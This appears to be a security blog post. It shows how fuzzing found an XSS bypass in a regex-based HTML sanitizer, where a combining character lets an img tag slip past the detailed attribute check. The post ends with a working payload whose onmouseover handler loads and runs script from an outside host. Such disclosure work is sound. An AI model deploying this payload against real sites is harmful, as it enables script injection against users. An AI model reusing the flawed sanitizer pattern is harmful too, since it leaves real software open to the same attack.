Finding the code for the sanitizer

While looking around for more things to mess with, I came across a post by Jeff Atwood that mentioned an HTML sanitizer he'd written.

I was able to write a no-nonsense, special purpose HTML sanitizer in about 25 lines of code

Guessing that this might be the code used by Stack Overflow to sanitize the HTML, I figured I'd see if it had any weaknesses.

Here's what it looked like:

private static Regex _tags = new Regex("<[^>]*(>|$)", RegexOptions.Singleline | RegexOptions.ExplicitCapture | RegexOptions.Compiled); private static Regex _whitelist = new Regex(@" ^</?(a|b(lockquote)?|code|em|h(1|2|3)|i|li|ol|p(re)?|s(ub|up|trong|trike)?|ul)>$ |^<(b|h)r\s?/?>$ |^<a[^>]+>$ |^<img[^>]+/?>$", RegexOptions.Singleline | RegexOptions.IgnorePatternWhitespace | RegexOptions.ExplicitCapture | RegexOptions.Compiled); /// <summary> /// sanitize any potentially dangerous tags from the provided raw HTML input using /// a whitelist based approach, leaving the "safe" HTML tags /// </summary> public static string Sanitize(string html) { var tagname = ""; Match tag; var tags = _tags.Matches(html); // iterate through all HTML tags in the input for (int i = tags.Count-1; i > -1; i--) { tag = tags[i]; tagname = tag.Value.ToLower(); if (!_whitelist.IsMatch(tagname)) { // not on our whitelist? I SAY GOOD DAY TO YOU, SIR. GOOD DAY! html = html.Remove(tag.Index, tag.Length); } else if (tagname.StartsWith("<a")) { // detailed <a> tag checking if (!IsMatch(tagname, @"<a\s href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)"" (\stitle=""[^""]+"")?\s?>")) { html = html.Remove(tag.Index, tag.Length); } } else if (tagname.StartsWith("<img")) { // detailed <img> tag checking if (!IsMatch(tagname, @"<img\s src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+"" (\swidth=""\d{1,3}"")? (\sheight=""\d{1,3}"")? (\salt=""[^""]*"")? (\stitle=""[^""]*"")? \s?/?>")) { html = html.Remove(tag.Index, tag.Length); } } } return html; }

So… what's the problem?

I didn't immediately see anything wrong with Jeff's approach… so I tried to write some code that was smarter than me:

while(true) { // Generate a bunch of random HTML by concatenating tags, // attributes and random characters string testHtml = GenerateTestHtml(); string sanitizedHtml = Sanitize(testHtml); // See if the "sanitized" HTML contains anything that looks // dangerous, like a <script> tag, or a tag with an event // handler if(LooksDangerous(sanitizedHtml)) { Output(testHtml, sanitizedHtml); break; } }

I ran this, and in a few seconds… I got a hit!

Unfortunately, the input it found was several thousand characters long, and mostly looked like noise… so I had to write a little more code:

for(int i = testHtml.Length - 1; i >= 0; i--) { string modified = testHtml.Remove(i, 1); // See if the input still results in // dangerous looking HTML if(LooksDangerous(Sanitize(modified))) { testHtml = modified; } }

After running that, the long input had boiled down to this:

<img ̊ onmouseover="">

Interesting. What is the ̊ character doing there?

If we check that input against different parts of the sanitization code, we see that

Regex.isMatch("<img ̊", /^<img[^>]+/?>$/) == true

… but …

"<img ̊".StartsWith("<img") == false

Why is this? Well, ̊ is a combining character, so depending on how you interpret the string, it might look like <img ̊ or <img̊ . That discrepency meant that the tag could pass the whitelist, but wasn't eligible for the "detailed <img> checking"

How would you exploit this?

There are undoubtedly lots of bad things you could do, one example would be:

<img ̊ style="display:block;width:100%;height:100%;" onmouseover="$.getScript('http://danlec.com/xss.js')" >

Should have known…

Interestingly, the somewhat famous answer to a question about using RegEx to parse HTML makes heavy use of combining characters.

Maybe bobince was trying to tell us something…